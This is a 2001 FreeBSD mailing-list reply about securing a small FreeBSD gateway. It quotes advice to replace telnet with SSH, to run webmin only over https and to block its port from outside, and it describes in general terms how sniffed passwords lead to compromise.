From owner-freebsd-questions Sat May 26 21:39:52 2001 Delivered-To: freebsd-questions@freebsd.org Received: from smtp018.mail.yahoo.com (smtp018.mail.yahoo.com [216.136.174.115]) by hub.freebsd.org (Postfix) with SMTP id 172FB37B422 for ; Sat, 26 May 2001 21:39:48 -0700 (PDT) (envelope-from sky_tracker@yahoo.com) Received: from hse-toronto-ppp3490137.sympatico.ca (HELO d.tracker) (65.92.118.180) by smtp.mail.vip.sc5.yahoo.com with SMTP; 27 May 2001 04:39:47 -0000 X-Apparently-From: Received: (from david@localhost) by d.tracker (8.11.3/8.11.3) id f4R5dO702771; Sun, 27 May 2001 05:39:24 GMT (envelope-from david) Date: Sun, 27 May 2001 00:39:23 -0500 From: David Banning To: Bill Moran Cc: david@banning.com, questions@FreeBSD.ORG Subject: Re: security question Message-ID: <20010527003923.A1691@yahoo.com> Reply-To: David Banning References: <200105260324.f4Q3OrH00551@d.tracker> <3B0FC0D0.28E01292@iowna.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <3B0FC0D0.28E01292@iowna.com>; from wmoran@iowna.com on Sat, May 26, 2001 at 10:42:24AM -0400 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sat, May 26, 2001 at 10:42:24AM -0400, Bill Moran wrote: > David Banning wrote: > > > > I am setting up a small network of Windows desktops that are > > accessing the net through a FreeBSD server. If I disable telnet, ftp, > > and everything in inetd.conf leaving only http open, what are my > > risks? > > Your risks are that someone will crack through your http server(s). All > you need to do at this point it monitor security alerts for whatever web > server your running and keep it up to date. > > > I have webadmin running. > > DO NOT run webmin over the internet via http. You are absolutely begging > for trouble if you do that. OK, OK, I won't. >Install it to run over https if you want to > access it via the Internet (I believe there's a how-to with the > installation). If you only want to use webmin internally, be sure to > block port 901 from the outside. I will look into that. > > > I'd would *like* telnet and shell (rshd) to run, so I can telnet > > in. I can't imagine how someone could break in to a system, so > > I am pretty lost in assessing this risk. > > If you're only using telnet/ftp internally you have a very low risk. > However, if you are using telnet/ftp over the Internet the risk is VERY > HIGH. Here is a common scenerio of what might happen. > Cracker mananges to compromise one of your ISPs firewalls/routers or any > other intermediate machine between your telnet client and telnet server. > He runs a traffic sniffing script that is filtering out useful data like > telnet passwords and emailing it to him regurlaly. You log in one day > and su to root to make some minor config change on the system. The > cracker now has full access to your network, and will likely use it as a > jump point for other attacks (if he has no interest in it directly) So > even if he doesn't bother to hurt you, he has used you to further > compromise the internet as a whole. > A similar scenerio could occur with webmin or ftp. If you'd like to see > a demonstration, I'd be happy to arrange it, I've done it for other > folks to scare them into sanity. How does the demonstration go? > > > I know SSH is better for telneting in to the server, but then > > it has to be on every machine that you telnet in from. > > Weigh the cost vrs. risk here. A free windows ssh client like putty > (http://www.chiark.greenend.org.uk/~sgtatham/putty/) makes you a fool > not to use ssh. OK - I've got it, I've been using the telnet side. I'm just trying to fugure out how to use SSH. > > > When I hear "don't use telnet unless you have to", I > > wonder. I know several sites that have telnet where I can login, > > and those places are alot bigger that my little'ol place. > > This is exactly why it is so dangerous. Large numbers of systems are > already compromised, each one of these can be used to sniff passwords, > etc. Remember those highly publicized attacks on yahoo and other not > long ago. Those attacks required hundreds of cracked computers to > execute. > If you're wondering why someone would bother to attack you, then ask > yourself this: why would someone bother to cripple yahoo's servers? > There was no financial gain involved. No credit card numbers were > stolen. > At the very least, you don't want to be one of the people who gets a > call the next time. "Mr. Banning, it appears your server has been > cracked and is being used as part of a large scale denial of service > attack, could you please take the necessary steps to stop this attack > and re-secure your server." (Generally means, shutdown your machine and > reinstall, change every password - since there's no other way to > guarantee the security after that.) Yikes- > > place to learn about this topic? > > I started with the FreeBSD Security How-to which is a good starter. > > www.rootprompt.org generally has good articles on this topic. Bill, your message has been very informative and helpful. Thanks. _________________________________________________________ Do You Yahoo!? Get your free @yahoo.com address at http://mail.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message